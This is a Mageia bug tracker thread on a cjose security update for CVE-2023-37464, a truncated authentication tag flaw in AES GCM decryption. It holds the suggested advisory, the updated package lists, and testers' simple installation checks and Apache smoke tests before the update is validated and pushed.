Bug 32274

Version : 0.6.2.2 ... Security fix for CVE-2023-37464

No maintainer in view for this pkg, so assigning the update globally.

Assignee: bugsquad => pkg-bugs
Status comment: (none) => Fixed in 0.6.2.2

Suggested advisory:
========================

The updated packages fix a security vulnerability:

The AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE. The spec says that a fixed length of 16 octets must be applied. Therefore this bug allows an attacker to provide a truncated Authentication Tag and to modify the JWE accordingly. (CVE-2023-37464)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37464
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DFWAPMYYVBO2U65HPYDTBEKNSXG4TP5C/
========================

Updated packages in 9/core/updates_testing:
========================
lib(64)cjose0-0.6.1-3.1.mga9
lib(64)cjose-devel-0.6.1-3.1.mga9

from SRPM:
cjose-0.6.1-3.1.mga9.src.rpm

Updated packages in 8/core/updates_testing:
========================
lib(64)cjose0-0.6.1-1.1.mga8
lib(64)cjose-devel-0.6.1-1.1.mga8

from SRPM:
cjose-0.6.1-1.1.mga8.src.rpm

Status comment: Fixed in 0.6.2.2 => (none)
Status: NEW => ASSIGNED
Assignee: pkg-bugs => nicolas.salguero

MGA8-64 Xfce on Acer Aspire 5253
No installation issues
No wiki, no previous updates, so
# urpmq --whatrequires lib64cjose0
apache-mod_auth_openidc
apache-mod_auth_openidc
apache-mod_auth_openidc
lib64cjose-devel
lib64cjose-devel
lib64cjose0
and
# urpmq --whatrequires-recursive lib64cjose0
apache-mod_auth_openidc
apache-mod_auth_openidc
apache-mod_auth_openidc
lib64cjose-devel
lib64cjose-devel
lib64cjose0
No idea how to get any further here and googling does not bring me any further than the repos.

CC: (none) => herman.viaene

(In reply to Herman Viaene from comment #3)
> MGA8-64 Xfce on Acer Aspire 5253
> No installation issues
> No wiki, no previous updates, so
> # urpmq --whatrequires lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> and
> # urpmq --whatrequires-recursive lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> No idea how to get any further here and googling does not bring me any
> further than the repos.

Any suggestions for how to test this update? Asking for feedback

Keywords: (none) => feedback
CC: (none) => marja11

(In reply to Herman Viaene from comment #3)
> MGA8-64 Xfce on Acer Aspire 5253
> No installation issues
> No wiki, no previous updates, so
> # urpmq --whatrequires lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> and
> # urpmq --whatrequires-recursive lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> No idea how to get any further here and googling does not bring me any
> further than the repos.

I found this https://groups.google.com/g/mod_auth_openidc/c/-7XkKimba2I , but is too much for me

MGA8-64 Plasma in VirtualBox.

For lack of anything else to try, I decided to look for previous bugs for apache-mod_auth_openidc. I installed that, which brought in lib64cjose0, then used qarepo to update lib64cjose0. There were no installation issues. Then I used the basic test found in bug25810:

[root@localhost ~]# systemctl  start httpd  
[root@localhost ~]# systemctl -l status httpd
● httpd.service - The Apache HTTP Server
     Loaded: loaded (/usr/lib/systemd/system/httpd.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2023-12-17 16:06:26 EST; 22s ago
   Main PID: 18862 (httpd)
     Status: "Total requests: 0; Idle/Busy workers 100/0;Requests/sec: 0; Bytes served/sec:   0 B/sec"
      Tasks: 6 (limit: 3566)
     Memory: 7.7M
        CPU: 72ms
     CGroup: /system.slice/httpd.service
             ├─18862 /usr/sbin/httpd -DFOREGROUND
             ├─18864 /usr/sbin/httpd -DFOREGROUND
             ├─18865 /usr/sbin/httpd -DFOREGROUND
             ├─18866 /usr/sbin/httpd -DFOREGROUND
             ├─18867 /usr/sbin/httpd -DFOREGROUND
             └─18868 /usr/sbin/httpd -DFOREGROUND

Dec 17 16:06:26 localhost systemd[1]: Starting The Apache HTTP Server...
Dec 17 16:06:26 localhost systemd[1]: Started The Apache HTTP Server.
Dec 17 16:06:26 localhost httpd[18862]: AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using ::1. Set the 'ServerName' directive globally to suppress this message

Then I pointed firefox toward localhost, receiving a page that said "It works!"

That and a clean install was enough for that bug, so I'm using it here, too.

This is good on MGA8.

Whiteboard: MGA8TOO => MGA8TOO MGA8-64-OK
CC: (none) => andrewsfarm
Keywords: feedback => (none)

Mga9-64 Plasma with an i5-2500, Intel graphics.

Same procedure as comment 6, with the same results. Calling this good for MGA9.

Validating. Advisory in comment 2.

Keywords: (none) => validated_update
Whiteboard: MGA8TOO MGA8-64-OK => MGA8TOO MGA8-64-OK MGA9-64-OK
CC: (none) => sysadmin-bugs

Advisory from comment 2 added to SVN. Please remove the "advisory" keyword if it needs to be changed. It also helps when obsolete advisories are tagged as "obsolete"

Keywords: (none) => advisory

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2023-0350.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED